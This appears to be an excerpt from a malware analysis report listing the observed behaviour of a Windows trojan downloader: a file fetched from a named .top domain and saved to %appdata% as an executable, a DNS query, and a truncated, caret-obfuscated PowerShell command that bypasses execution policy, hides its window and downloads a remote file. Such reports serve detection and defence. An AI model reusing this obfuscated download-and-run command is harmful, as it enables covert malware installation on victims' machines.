Technical Information
- http://www.zonedopesa.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "power^s^hELL.Exe -EXEcUti^o^npOlicy^ bYPasS ^-^N^oPRO^F^iLe ^-^WI^NDOw^StY^lE H^iDden^ ^(n^eW^-^ob^jec^T^ ^sY^sTE^m.NET.w^eb^CLIENT^)^.^dO^wNLOAd^fIL^E(^'http://www.zonedopesa...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "power^s^hELL.Exe -EXEcUti^o^npOlicy^ bYPasS ^-^N^oPRO^F^iLe ^-^WI^NDOw^StY^lE H^iDden^ ^(n^eW^-^ob^jec^T^ ^sY^sTE^m.NET.w^eb^CLIENT^)^.^dO^wNLOAd^fIL^E(^'http://www.zonedopesa...' (with hidden window)